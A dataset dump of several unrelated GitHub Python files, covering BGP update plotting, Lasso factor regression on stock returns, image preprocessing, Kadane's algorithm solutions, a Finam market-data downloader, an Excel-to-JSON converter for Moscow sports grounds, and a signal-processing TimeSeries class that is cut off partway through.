print(f\"max announced/peer/interval: {max_announced}\")\n print(f\"max withdrawn/peer/interval: {max_withdrawn}\")\n\n return (plt_times, plt_total_msg, plt_avg_msg_per_peer, plt_avg_announced_per_peer, plt_avg_withdrawn_per_peer)\n\nif len(sys.argv) < 2:\n help()\n sys.exit(1)\n\nif len(sys.argv) >= 4:\n dataset_len = int(sys.argv[3])\nelse:\n dataset_len = 3600\n\ninterval_data = []\ninterval_lengths = sys.argv[2].split(\",\")\n\nplt_min = float('inf')\nplt_max = 0\nfor i in interval_lengths:\n subdata = calc(int(i), dataset_len)\n interval_data.append(subdata)\n subplt_min = min([*subdata[1], *subdata[2], *subdata[3], *subdata[4]])\n subplt_max = max([*subdata[1], *subdata[2], *subdata[3], *subdata[4]])\n plt_min = min(plt_min, subplt_min)\n plt_max = max(plt_max, subplt_max)\n\ndatarange = [plt_min-100, plt_max+100]\nif datarange[0] < 1:\n datarange[0] = 1\n\n# now plot the data\ncm = 1/2.54\n#fig = plt.figure(figsize=(17*cm, 29*cm))\n#plt.subplots_adjust(hspace=0.5)\n\nmarkers = [\"b.\", \"gx\", \"rs\", \"k*\", \"b2\", \"gp\"]\n\n#plt.subplot(411)\nprint(\"Showing: total_msg\")\nfig = plt.figure(figsize=(20*cm, 7*cm))\nfor i, data in enumerate(interval_data):\n plt.plot(data[0], data[1], markers[i%6], label=f\"{interval_lengths[i]}s intervals\") # x:plt_times y:plt_total_msg\nplt.ylabel('Total number\\nof UPDATEs [#]')\nplt.xlabel(f\"Time [s]\")\nplt.yscale(\"log\")\nplt.legend(loc=\"upper center\", bbox_to_anchor=(0.5, 1.2), ncol=3)\nplt.ylim(datarange)\nplt.tight_layout()\nplt.show()\n\n#plt.subplot(412)\nprint(\"Showing: avg_msg_per_peer\")\nfig = plt.figure(figsize=(20*cm, 7*cm))\nfor i, data in enumerate(interval_data):\n plt.plot(data[0], data[2], markers[i%6], label=f\"{interval_lengths[i]}s intervals\") # x:plt_times y:plt_avg_msg_per_peer\nplt.ylabel('Average UPDATEs\\nper peer [#]')\nplt.xlabel(f\"Time [s]\")\nplt.yscale(\"log\")\nplt.legend(loc=\"upper center\", bbox_to_anchor=(0.5, 1.2), ncol=3)\nplt.ylim(datarange)\nplt.tight_layout()\nplt.show()\n\n#plt.subplot(413)\nprint(\"Showing: 
avg_announced_per_peer\")\nfig = plt.figure(figsize=(20*cm, 7*cm))\nfor i, data in enumerate(interval_data):\n plt.plot(data[0], data[3], markers[i%6], label=f\"{interval_lengths[i]}s intervals\") # x:plt_times y:plt_avg_announced_per_peer\nplt.ylabel('Average announced\\nprefixes/peer [#]')\nplt.xlabel(f\"Time [s]\")\nplt.yscale(\"log\")\nplt.legend(loc=\"upper center\", bbox_to_anchor=(0.5, 1.2), ncol=3)\nplt.ylim(datarange)\nplt.tight_layout()\nplt.show()\n\n#plt.subplot(414)\nprint(\"Showing: avg_withdrawn_per_peer\")\nfig = plt.figure(figsize=(20*cm, 7*cm))\nfor i, data in enumerate(interval_data):\n plt.plot(data[0], data[4], markers[i%6], label=f\"{interval_lengths[i]}s intervals\") # x:plt_times y:plt_avg_withdrawn_per_peer\nplt.ylabel('Average withdrawn\\nprefixes/peer [#]')\nplt.xlabel(f\"Time [s]\")\nplt.yscale(\"log\")\nplt.legend(loc=\"upper center\", bbox_to_anchor=(0.5, 1.2), ncol=3)\nplt.ylim(datarange)\nplt.tight_layout()\nplt.show()\n","repo_name":"marcelb98/da-tools","sub_path":"update_counter/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":7821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11570704884","text":"from dfply import *\nimport pandas as pd\nimport os\nimport datetime\nfrom sklearn import linear_model\nimport time\nfrom multiprocessing import Pool\nfrom functools import partial\nfrom sklearn.metrics import mean_squared_error\nimport matplotlib.pyplot as plt\nfrom collections import Counter\nos.chdir(r\"c:\\Users\\ChonWai\\Desktop\\machine learning\\data\")\n\n\ndef end_of_month(any_day):\n next_month = any_day.replace(day=28) + datetime.timedelta(days=4) # this will never fail\n return next_month - datetime.timedelta(days=next_month.day)\n\n\ndef lasso(permno, msf, x_train, x_test):\n \"\"\"\n perfrom a lasso regression\n :param permno:\n :param msf:\n :param x_train:\n :param x_test:\n :return: a dict which contail the following in order: predict return, alpha that use in the model, coeficient of all\n x variable\n \"\"\"\n training_y = msf >> mask(X.date <= '2008-01-31', X.permno == permno) >> select(X.ret)\n testing_y = msf >> mask(X.date > '2008-01-31', X.permno == permno) >> select(X.ret)\n lasso_reg = linear_model.Lasso()\n alphas = np.logspace(-10, -1, 10)\n # try to find the best r square by trying different alpha\n r_square_list = [lasso_reg.set_params(alpha=alpha).fit(x_train, training_y).score(x_test, testing_y)\n for alpha in alphas]\n lasso_reg.set_params(alpha=alphas[r_square_list.index(max(r_square_list))])\n lasso_reg.fit(x_train, training_y)\n in_sample_mse = mean_squared_error(training_y, lasso_reg.predict(x_train))\n out_sample_mse = mean_squared_error(testing_y, lasso_reg.predict(x_test))\n return {\"permno\": str(permno), \"pred_y\": lasso_reg.predict(x_test), \"alpha\": lasso_reg.alpha,\n \"coef\": lasso_reg.coef_, \"in_sample_mse\": in_sample_mse, \"out_sample_mse\": out_sample_mse}\n\n\nif __name__ == '__main__':\n start_time = time.time()\n ff5 = pd.read_csv(\"Fama French 5 Factors.CSV\", skiprows=2)\n ps = pd.read_csv(\"Pastor Stambaugh Factors.csv\")\n hxz = pd.read_excel(\"HXZ q-Factors (monthly 1967 to 2014).xlsx\")\n msf = pd.read_csv(\"cleaned_data.csv\")\n # renaming the columns\n ff5.rename(columns={\"Unnamed: 0\": \"date\", \"Mkt-RF\": \"mkt_rf\", \"SMB\": \"smb\", \"HML\": \"hml\", \"RMW\": \"rmw\", \"CMA\": \"cma\",\n \"RF\": \"rf\"}, inplace=True)\n\n # seperating the monthly data and the annual data from ff5 csv\n monthly_ff5 = ff5.iloc[: 
ff5.index[ff5.date == ' Annual Factors: January-December '].tolist()[0]]\n monthly_ff5[\"date\"] = pd.to_datetime(monthly_ff5[\"date\"], format='%Y%m')\n monthly_ff5.date = monthly_ff5.date.apply(end_of_month)\n monthly_ff5 = monthly_ff5.astype({\"mkt_rf\": float, \"smb\": float, \"hml\": float, \"rmw\": float, \"cma\": float, \"rf\": float})\n annual_ff5 = ff5.loc[ff5.index[ff5.date == ' Annual Factors: January-December '].tolist()[0] + 2:]\n annual_ff5.date = [date.strip() for date in annual_ff5.date]\n annual_ff5 = annual_ff5.astype({\"mkt_rf\": float, \"smb\": float, \"hml\": float, \"rmw\": float, \"cma\": float, \"rf\": float})\n hxz.rename(columns={\"Year\": \"year\", \"Month\": \"month\", \"MKT\": \"mkt\", \"ME\": \"me\", \"I/A\": \"i/a\", \"ROE\": \"roe\"},\n inplace=True)\n hxz.insert(0, \"date\", pd.to_datetime(hxz[[\"year\", \"month\"]].assign(Day=1)))\n hxz.date = hxz.date.apply(end_of_month)\n ps.rename(columns={\"DATE\": \"date\", \"PS_LEVEL\": \"ps_level\", \"PS_INNOV\": \"ps_innov\", \"PS_VWF\": \"ps_vwf\"},\n inplace=True)\n ps.date = pd.to_datetime(ps.date, format=\"%Y%m%d\").apply(end_of_month)\n msf.pop(\"index\")\n msf.insert(0, \"date\", pd.to_datetime(msf[\"time_stamp\"], format=\"%Y%m%d\"))\n # assign the result back; Series.apply is not in-place\n msf.date = msf.date.apply(end_of_month)\n msf.pop(\"time_stamp\")\n msf.rename(columns={\"stock_id\": \"permno\", \"price\": \"prc\", \"return\": \"ret\"}, inplace=True)\n all_factor = pd.merge(ps, monthly_ff5, how=\"outer\", on=\"date\")\n all_factor = pd.merge(all_factor, hxz, how=\"outer\", on=\"date\")\n # drop the irrelevant factors\n all_factor = all_factor.drop([\"mkt\", \"year\", \"month\"], axis=1)\n # assign the result back; dfply pipes return a new DataFrame\n all_factor = all_factor >> arrange(X.date)\n for lag_month in range(6):\n for factor in ['ps_level', 'ps_innov', 'ps_vwf', 'mkt_rf', 'smb', 'hml', 'rmw', 'cma', 'rf', 'me', 'i/a',\n 'roe']:\n all_factor[factor + \"_lag\" + str(lag_month + 1)] = all_factor[factor].shift(lag_month + 1)\n # Lasso regression\n # separating the training set and the testing set\n # Since msf starts in 1989, the training set runs from 1989-01-31 to 2008-01-31\n # and the testing set ends at 2012-12-31\n training_x = all_factor.dropna().query(\"date >= '1989' & date <= '2008-01-31'\")[all_factor.columns[1:]]\n testing_x = all_factor.dropna().query(\"date > '2008-01-31' & date <= '2012-12-31' \")[all_factor.columns[1:]]\n permno_list = list(set(msf.permno))\n p = Pool(processes=7)\n # dispatch the per-permno regressions to the worker pool\n result = p.map(partial(lasso, msf=msf, x_train=training_x, x_test=testing_x), permno_list)\n p.close()\n pred_y_list = []\n alpha_list = []\n coef_list = []\n in_sample_error_list = []\n out_sample_error_list = []\n for dictionary in result:\n pred_y_list.append(dictionary[\"pred_y\"].tolist())\n alpha_list.append(dictionary[\"alpha\"])\n coef_list.append(dictionary[\"coef\"].tolist())\n in_sample_error_list.append(dictionary[\"in_sample_mse\"])\n out_sample_error_list.append(dictionary[\"out_sample_mse\"])\n x = [str(permno) for permno in permno_list]\n y_in_sample = in_sample_error_list\n y_out_sample = out_sample_error_list\n ax1 = plt.subplot(1, 1, 1)\n postion_x = np.arange(len(permno_list))\n width = 0.3\n plt.xticks(postion_x + width / 2, x, rotation='vertical')\n in_sample_bar = ax1.bar(postion_x, y_in_sample, width=0.3, color=\"blue\")\n ax2 = ax1.twinx()\n out_sample_bar = ax2.bar(postion_x + 0.3, y_out_sample, width=0.3, color=\"red\")\n plt.legend([in_sample_bar, out_sample_bar], [\"In Sample MSE\", \"Out Sample MSE\"])\n plt.ylabel(\"MSE\", fontdict={\"fontweight\": \"bold\"})\n plt.xlabel(\"Permno\", 
fontdict={\"fontweight\": \"bold\"})\n plt.title(\"In Sample and out sample MSE comparsion\",\n fontdict={\"fontstyle\": \"italic\", \"fontweight\": \"bold\"})\n plt.show()\n plt.close()\n # The in sample and out of sample prediction error\n print(\"average in sample error of all assets:\")\n print(np.average(y_in_sample))\n print(\"average out sample error of all assets:\")\n print(np.average(y_out_sample))\n # plot the factors selection frequency for all sample\n factors = []\n for permno_coef in coef_list:\n permno_factor = [all_factor.columns[1:][permno_coef.index(coef)] for coef in permno_coef if coef > 0]\n factors.extend(permno_factor)\n factors_freq = Counter(factors)\n factors_freq = pd.Series(factors_freq)\n x_factor = factors_freq.index.tolist()\n y_factor_freq = factors_freq.values.tolist()\n y_factor_freq.sort(reverse=True)\n postion_x_factor = np.arange(len(x_factor))\n width = 0.3\n plt.xticks(postion_x_factor, x_factor, rotation='vertical')\n freq_bar = plt.bar(postion_x_factor, y_factor_freq, width=0.3, color=\"blue\")\n plt.legend(freq_bar, [\"Factors Frequency\"])\n plt.ylabel(\"Frequency\", fontdict={\"fontweight\": \"bold\"})\n plt.xlabel(\"Factors\", fontdict={\"fontweight\": \"bold\"})\n plt.title(\"Factors Selection Frequency \",\n fontdict={\"fontstyle\": \"italic\", \"fontweight\": \"bold\"})\n plt.show()\n plt.close()\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Sherry2Wei/ML_pset1","sub_path":"hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":7427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9182573904","text":"from PIL import Image\nimport numpy as np\nfrom settings import IMAGE_SIZE\n\n\ndef preprocess_image(fp):\n im = Image.open(fp)\n im = im.convert('RGB')\n side = min(im.size)\n x = (im.width - side) / 2\n y = (im.height - side) / 2\n square = (x, y) + (side,) * 2\n im = im.crop(square)\n im = im.resize(IMAGE_SIZE, resample=Image.BILINEAR)\n data = np.array(im.getdata())\n data = data.reshape(im.size + (3,))\n data = data / 255.0\n return data\n","repo_name":"sheuvi21/simple-convnet","sub_path":"tools/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7957303200","text":"def find_max(nums: List[int]) -> int:\n local_max = global_max = nums[0]\n for num in nums[1:]:\n local_max = max(num, local_max + num)\n global_max = max(global_max, local_max)\n return global_max\n\n\nclass Solution: # greedy # Kadane's algorithm # O(n) time 0(1) space\n def maxSubarraySumCircular(self, A: List[int]) -> int:\n positive = find_max(A)\n negative = find_max([-num for num in A]) + sum(A)\n\n if negative and negative > positive:\n return negative\n return positive\n\n\nclass Solution2:\n # greedy # Kadane's algorithm # O(1n) time 0(1) space\n def maxSubarraySumCircular(self, A: List[int]) -> int:\n local_max = global_max = local_min = global_min = accum = A[0]\n for num in A[1:]:\n local_max = max(num, local_max + num)\n global_max = max(local_max, global_max)\n\n local_min = min(num, local_min + num)\n global_min = min(local_min, global_min)\n\n accum += num\n\n return max((accum - global_min) or global_max, 
global_max)\n","repo_name":"aBulgakoff/algos","sub_path":"leetcode/dp_n_greedy/918_max_sum_circular_subarr.py","file_name":"918_max_sum_circular_subarr.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71405435619","text":"import pandas as pd\n\nfrom pendulum import from_format, today\nfrom datetime import datetime\nfrom time import sleep\nfrom urllib.parse import urlencode\nfrom urllib.request import Request, urlopen\n\n\nPERIOD = 7\nFINAM_URL = 'http://export.finam.ru/'\nMARKET = 1\nAPPLY = 0\nDTF = 1\nTMF = 1\nMSOR = 0\nMSTIME = 'on'\nMSTIMEVER = 1\nSEP = 1\nSEP2 = 1\nDATF = 1\nAT = 0\n\n\nclass Parser:\n \"\"\"\n\n \"\"\"\n def __init__(self, ticker, from_, to_=None, split_period='month', is_feature=False, meta_df=None, subdata=False):\n \"\"\"\n\n :param ticker:\n :param from_:\n :param to_:\n :param split_period:\n :param is_feature:\n :param meta_df:\n :param subdata:\n \"\"\"\n self.ticker = ticker\n self.from_ = from_\n self.to_ = to_\n self.split_period = split_period\n self.is_feature = is_feature\n self.subdata = subdata\n self.short_code = {'BR': 'BR', 'BZ': 'BZ', 'NG': 'NG', 'PT': 'PLT',\n 'GD': 'GOLD', 'GC': 'GC', 'SV': 'SILV'}\n self.features_codes = dict(zip(range(12),\n ['F', 'G', 'H', 'J', 'K', 'M', 'N', 'Q', 'U', 'V', 'X', 'Z']))\n if self.to_:\n self.last_date_time = from_format(self.to_, 'DD.MM.YYYY HH:00:00', tz='Europe/Moscow')\n else:\n self.last_date_time = today(tz='Europe/Moscow')\n\n self.meta_information = meta_df\n self.headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}\n self.url_suffix = [('dtf', DTF), ('tmf', TMF), ('MSOR', MSOR), ('mstime', MSTIME),\n ('mstimever', MSTIMEVER), ('sep', SEP), ('sep2', SEP2), ('datf', DATF), ('at', AT)]\n\n self.ticker_horly_data = []\n\n def get_dates_by_period(self, from_, to_):\n \"\"\"\n\n :param from_:\n :param to_:\n :return:\n \"\"\"\n dates = []\n new_from_ = from_\n while True:\n if self.split_period == 'month':\n new_to_ = from_format(new_from_, 'DD.MM.YYYY HH:00:00').add(months=1).strftime('%d.%m.%Y %H:00:00')\n elif self.split_period == 'quarter':\n new_to_ = from_format(new_from_, 'DD.MM.YYYY HH:00:00').add(months=3).strftime('%d.%m.%Y %H:00:00')\n else:\n new_to_ = from_format(new_from_, 'DD.MM.YYYY HH:00:00').add(years=1).strftime('%d.%m.%Y %H:00:00')\n\n if pd.Timestamp(to_) < pd.Timestamp(new_to_):\n dates.append([new_from_, to_])\n break\n else:\n dates.append([new_from_, new_to_])\n new_from_ = new_to_\n return dates\n\n def get_url_period(self, ticker, start, end, code_name):\n \"\"\"\n\n :param ticker:\n :param start:\n :param end:\n :return:\n \"\"\"\n start_date = from_format(start, 'DD.MM.YYYY HH:00:00')\n end_date = from_format(end, 'DD.MM.YYYY HH:00:00')\n file_name = f'{ticker}_{start_date.strftime(\"%d%m%y\")}_{end_date.strftime(\"%d%m%y\")}'\n file_name_ext = '.txt'\n\n if self.is_feature:\n m = (start_date.month // 3 + 1) * 3 % 15 + ((start_date.month // 3 + 1) * 3 // 15) * 3\n code = f\"{self.ticker}{self.features_codes[m - 1]}{start_date.add(months=1).year % 10}\"\n name = f\"{self.short_code[self.ticker]}-{m}.{start_date.add(months=1).strftime('%y')}\"\n curr_df = self.meta_information[(self.meta_information['code'] == code) &\n (self.meta_information['name'].str.contains(name))]\n if curr_df.empty:\n return None\n else:\n code = self.ticker\n curr_df = 
self.meta_information[(self.ticker == self.meta_information[code_name]) &\n (self.meta_information['market'].isin([1, 5, 24, 25, 45]))]\n\n self.em = curr_df['id'].values[0]\n self.market = curr_df['market'].values[0]\n\n params = urlencode([('market', self.market), ('em', self.em), ('code', code), ('apply', APPLY),\n ('df', start_date.day), ('mf', start_date.month - 1), ('yf', start_date.year),\n ('from', start_date.strftime(\"%d.%m.%Y\")),\n ('dt', end_date.day), ('mt', end_date.month - 1), ('yt', end_date.year),\n ('to', end_date.strftime(\"%d.%m.%Y\")),\n ('p', PERIOD), ('f', file_name), ('e', file_name_ext), ('cn', code)] + self.url_suffix)\n\n url_period = FINAM_URL + file_name + f'{file_name_ext}?' + params\n return url_period\n\n def get_data_period(self, url):\n \"\"\"\n\n :param url:\n :return:\n \"\"\"\n query = Request(url)\n query.add_header('User-Agent', self.headers['User-Agent'])\n\n data_period = urlopen(query).readlines()\n\n return data_period\n\n def get_candles(self, code_name):\n \"\"\"\n\n :return:\n \"\"\"\n all_data = []\n for start, end in self.get_dates_by_period(self.from_, self.to_):\n\n url_period = self.get_url_period(self.ticker, start, end, code_name)\n if url_period:\n data_period = self.get_data_period(url_period)\n sleep(.5)\n all_data += data_period\n\n return all_data\n\n def get_all_data_as_df(self, all_data):\n \"\"\"\n\n :param all_data:\n :return:\n \"\"\"\n for h_data in all_data:\n h_data = h_data.strip().decode(\"utf-8\").split(',')\n y = int(h_data[2][:4])\n m = int(h_data[2][4:6])\n d = int(h_data[2][6:])\n h = int(h_data[3][:2])\n date_time = pd.Timestamp(datetime(y, m, d, h, 0, 0), tz='Europe/Moscow')\n if self.last_date_time < date_time:\n break\n if self.market in [5, 14, 17, 24, 25, 45]:\n start_time = 10\n end_time = 23\n else:\n start_time = 10\n end_time = 19\n\n if (date_time.hour >= start_time) and (date_time.hour < end_time):\n if self.subdata:\n self.ticker_horly_data.append([date_time.strftime('%Y-%m-%d %H:00:00'), float(h_data[7])])\n else:\n self.ticker_horly_data.append([date_time.strftime('%Y-%m-%d %H:00:00'),\n float(h_data[4]),\n float(h_data[5]),\n float(h_data[6]),\n float(h_data[7]),\n int(h_data[8])])\n return self.ticker_horly_data\n\n def parse(self, code_name='code'):\n \"\"\"\n\n :return:\n \"\"\"\n all_data = self.get_candles(code_name)\n return self.get_all_data_as_df(all_data)\n\n","repo_name":"Brutalfacepalm/investing","sub_path":"services/service_files/parser_data.py","file_name":"parser_data.py","file_ext":"py","file_size_in_byte":7064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19090866193","text":"\"\"\"\nВам дан xlsx-файл с информацией о спортивных площадках в Москве.\nВам необходимо сдать на проверку json-файл, в котором будет храниться один словарь,\nключами которого будут административные округа (AdmArea), а значениями словари, в которых,\nв свою очередь, ключами будут названия районов (District), относящихся к этому административному округу,\nа значениями - списки адресов площадок (Address) в том порядке, в котором они встречались в исходном файле.\n\nВаш файл должен выглядеть примерно так:\n\n{\"Северо-Западный административный округ\": {\"район Строгино\": [\"улица Исаковского, дом 24, корпус 1\",\n\"Неманский проезд, дом 9\"], \"район Северное Тушино\": [\"улица Свободы, дом 56\", \"улица Свободы, дом 56\",\n\"улица Свободы, дом 56\", \"улица Свободы, дом 56\"], \"район Покровское-Стрешнево\": [\"Иваньковское шоссе, дом 6\"],\n\"район 
Щукино\": [\"Сосновая улица, дом 3, строение 2\"]}, ...}\n\"\"\"\nimport openpyxl\nimport json\n\n\nwb = openpyxl.load_workbook('data-25290-2019-10-30.xlsx')\nws = wb.active\nmain_dict = {}\n\nfor val in range(2, ws.max_row + 1):\n adm_area = ws.cell(row=val, column=5).value\n district = ws.cell(row=val, column=6).value\n address = ws.cell(row=val, column=7).value\n if adm_area not in main_dict:\n main_dict[adm_area] = {district: [address, ]}\n elif district not in main_dict[adm_area]:\n main_dict[adm_area].update({district: [address, ]})\n else:\n main_dict[adm_area][district].append(address)\n\nfout = open('sport_places.json', 'w', encoding='utf-8')\njson.dump(main_dict, fout)\nfout.close()\n","repo_name":"snlnrush/hse-python-analyze-data","sub_path":"Week9/task-4.py","file_name":"task-4.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"29380344884","text":"import pathlib\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\nfrom signalai.tools.utils import join_dicts\n\n\nDTYPE_BYTES = {'float32': 4, 'float16': 2}\n\n\nclass TimeSeries:\n \"\"\"\n Stores either 1D signal or a 2D time-frequency transformation of a signal.\n First axis represents channel axis, the last one time axis.\n Operators:\n a + b - summing a and b\n a | b - joining channels of a and b\n a & b = concatenation of a and b\n \"\"\"\n full_dimensions = None\n\n def __init__(self, data_arr: np.ndarray = None, meta=None, time_map=None, fs: float = None):\n if meta is None:\n meta = {}\n\n if data_arr is not None and not isinstance(data_arr, np.ndarray):\n raise TypeError(f\"Unknown signal type {type(data_arr)}.\")\n\n if len(data_arr.shape) == (self.full_dimensions or 2) - 1: # channel axis missing\n data_arr = np.expand_dims(data_arr, axis=0)\n\n if self.full_dimensions is not None:\n if len(data_arr.shape) != self.full_dimensions:\n raise ValueError(f\"Type {type(self)} must have {self.full_dimensions} dimensions, not \"\n f\"{len(data_arr.shape)}.\")\n\n self.data_arr = data_arr\n\n if time_map is None:\n if self.data_arr is None:\n raise ValueError(\"Time map must be set when data_arr is None.\")\n self.time_map = np.ones((self.data_arr.shape[0], self.data_arr.shape[-1]), dtype=bool)\n else:\n self.time_map = time_map.astype(bool)\n\n if len(self.time_map.shape) == 1:\n self.time_map = np.expand_dims(self.time_map, axis=0)\n\n if len(self.time_map.shape) > 2:\n raise ValueError(f\"Data map must have one or two axes, not {len(self.time_map.shape)}.\")\n\n self.meta = meta.copy()\n self.fs = fs\n\n def crop(self, interval: tuple[int, int] = None):\n if interval is None:\n data_arr = self.data_arr\n time_map = self.time_map\n else:\n data_arr = self.data_arr[..., interval[0]:interval[1]]\n time_map = self.time_map[..., interval[0]:interval[1]]\n\n return type(self)(\n data_arr=data_arr,\n time_map=time_map,\n meta=self.meta,\n fs=self.fs,\n )\n\n def __len__(self):\n if self.data_arr is not None:\n return self.data_arr.shape[-1]\n\n return self.time_map.shape[-1]\n\n def astype_(self, dtype):\n self.data_arr = self.data_arr.astype(dtype)\n\n @property\n def channels_count(self):\n if self.data_arr is not None:\n return self.data_arr.shape[0]\n return self.time_map.shape[0]\n\n def take_channels(self, channels: list[set[int] | list[int] | int] = None):\n if channels is None:\n return self\n\n data_arrays = []\n time_maps = []\n for channel_gen in channels:\n if 
isinstance(channel_gen, set):\n channel_gen = int(np.random.choice(tuple(channel_gen)))\n\n if isinstance(channel_gen, int):\n data_arrays.append(self.data_arr[[channel_gen], ...])\n time_maps.append(self.time_map[[channel_gen], ...])\n elif isinstance(channel_gen, list) or isinstance(channel_gen, tuple):\n data_arrays.append(np.sum(self.data_arr[channel_gen, ...], axis=0))\n time_maps.append(np.any(self.time_map[channel_gen, ...], axis=0))\n else:\n raise TypeError(f\"Channel cannot be generated using type '{type(channel_gen)}'.\")\n\n return type(self)(\n data_arr=np.vstack(data_arrays),\n time_map=np.vstack(time_maps),\n meta=self.meta,\n fs=self.fs,\n )\n\n def trim(self, threshold=1e-5):\n first = np.min(np.argmax(np.abs(self.data_arr) > threshold, axis=1))\n last = len(self) - np.min(np.argmax(np.abs(self.data_arr[:, ::-1]) > threshold, axis=1))\n new_data_arr = self.data_arr[:, first: last]\n new_time_map = self.time_map[:, first: last]\n return type(self)(\n data_arr=new_data_arr.copy(),\n time_map=new_time_map.copy(),\n meta=self.meta.copy(),\n fs=self.fs,\n )\n\n def trim_(self, threshold=1e-5):\n first = np.min(np.argmax(np.abs(self.data_arr) > threshold, axis=1))\n last = len(self) - np.min(np.argmax(np.abs(self.data_arr[:, ::-1]) > threshold, axis=1))\n self.data_arr = self.data_arr[:, first: last]\n self.time_map = self.time_map[:, first: last]\n\n def margin_interval(self, interval_length: int = None, start_id=0):\n if interval_length is None:\n interval_length = len(self)\n\n if interval_length == len(self) and (start_id == 0 or start_id is None):\n return self\n\n new_data_arr = np.zeros((*self.data_arr.shape[:-1], interval_length), dtype=self.data_arr.dtype)\n new_time_map = np.zeros((self.data_arr.shape[0], interval_length), dtype=bool)\n\n if 0 < len(self) + start_id and start_id < interval_length:\n new_data_arr[..., max(0, start_id):min(interval_length, start_id + len(self))] = \\\n self.data_arr[..., max(0, -start_id):min(len(self), interval_length - start_id)]\n\n new_time_map[..., max(0, start_id):min(interval_length, start_id + len(self))] = \\\n self.time_map[..., max(0, -start_id):min(len(self), interval_length - start_id)]\n\n return type(self)(\n data_arr=new_data_arr,\n meta=self.meta,\n time_map=new_time_map,\n fs=self.fs,\n )\n\n def sum_channels(self):\n return type(self)(\n data_arr=np.sum(self.data_arr, axis=0),\n time_map=np.sum(self.time_map, axis=0),\n meta=self.meta,\n fs=self.fs,\n )\n\n def apply(self, func):\n return type(self)(\n data_arr=func(self.data_arr),\n meta=self.meta,\n time_map=self.time_map,\n fs=self.fs,\n )\n\n def __add__(self, other):\n if isinstance(other, type(self)):\n if len(self) != len(other):\n raise ValueError(f\"Adding signals with different lengths is forbidden (for a good reason). 
\"\n f\"{len(self)}, {len(other)}\")\n\n if (not (self.fs is None and other.fs is None)) and self.fs != other.fs:\n raise ValueError(\"Adding signals with different fs is forbidden (for a good reason).\")\n\n new_data_arr = self.data_arr + other.data_arr\n new_info = join_dicts(self.meta, other.meta)\n new_time_map = self.time_map | other.time_map\n\n else:\n new_data_arr = self.data_arr + other\n new_info = self.meta\n new_time_map = self.time_map.copy()\n\n return type(self)(\n data_arr=new_data_arr,\n meta=new_info,\n time_map=new_time_map,\n fs=self.fs,\n )\n\n def __and__(self, other):\n if isinstance(other, type(self)):\n other_ts = other\n new_info = join_dicts(self.meta, other.meta)\n else:\n other_ts = type(self)(other)\n new_info = self.meta\n\n if (not (self.fs is None and other.fs is None)) and self.fs != other.fs:\n raise ValueError(\"Joining signals with different fs is forbidden (for a good reason).\")\n\n new_data_arr = np.concatenate([self.data_arr, other_ts.data_arr], axis=-1)\n new_time_map = np.concatenate([self.time_map, other_ts.time_map], axis=-1)\n\n return type(self)(\n data_arr=new_data_arr,\n meta=new_info,\n time_map=new_time_map,\n fs=self.fs,\n )\n\n def __or__(self, other):\n if isinstance(other, type(self)):\n other_ts = other\n new_info = join_dicts(self.meta, other.meta)\n else:\n other_ts = type(self)(other)\n new_info = self.meta\n\n if len(self) != len(other):\n raise ValueError(f\"Joining signals with different lengths is forbidden (for a good reason). \"\n f\"{len(self)}, {len(other)}\")\n\n if (not (self.fs is None and other.fs is None)) and self.fs != other.fs:\n raise ValueError(f\"Joining signals with different fs is forbidden (for a good reason), {self.fs}, {other.fs}.\")\n\n new_data_arr = np.concatenate([self.data_arr, other_ts.data_arr], axis=0)\n new_time_map = np.concatenate([self.time_map, other_ts.time_map], axis=0)\n\n return type(self)(\n data_arr=new_data_arr,\n meta=new_info,\n time_map=new_time_map,\n fs=self.fs,\n )\n\n def __mul__(self, other):\n return type(self)(\n data_arr=self.data_arr * other,\n meta=self.meta,\n time_map=self.time_map,\n fs=self.fs,\n )\n\n def __truediv__(self, other):\n return type(self)(\n data_arr=self.data_arr / other,\n meta=self.meta,\n time_map=self.time_map,\n fs=self.fs,\n )\n\n def __eq__(self, other):\n return (np.all(self.data_arr == other.data_arr) and\n np.all(self.data_arr.shape == other.data_arr.shape) and\n self.meta == other.meta and\n np.all(self.time_map == other.time_map) and\n ((self.fs is None and other.fs is None) or self.fs == other.fs))\n\n def __repr__(self):\n return str(pd.DataFrame.from_dict(\n self.meta | {'length': len(self), 'channels': self.channels_count, 'fs': self.fs},\n orient='index', columns=['value'],\n ))\n\n def update_meta(self, dict_):\n self.meta = self.meta.copy()\n self.meta.update(dict_)\n\n\nclass Signal(TimeSeries):\n full_dimensions = 2\n\n def show(self, channels=0, figsize=(16, 3)):\n plt.figure(figsize=figsize)\n plt.plot(self.data_arr[channels])\n plt.show()\n\n def spectrogram(self, figsize=(16, 9), save_as=None, show=True):\n from scipy import signal as scipy_signal\n plt.figure(figsize=figsize)\n f, t, sxx = scipy_signal.spectrogram(self.data_arr[0], self.fs)\n sxx = np.sqrt(sxx)\n plt.pcolormesh(t, f, sxx, shading='gouraud')\n plt.ylabel('Frequency [Hz]')\n plt.xlabel('Time [sec]')\n if save_as is not None:\n plt.savefig(save_as)\n if show:\n plt.show()\n\n def spectrogram3(self, figsize=(16, 9), save_as=None, show=True):\n import librosa\n 
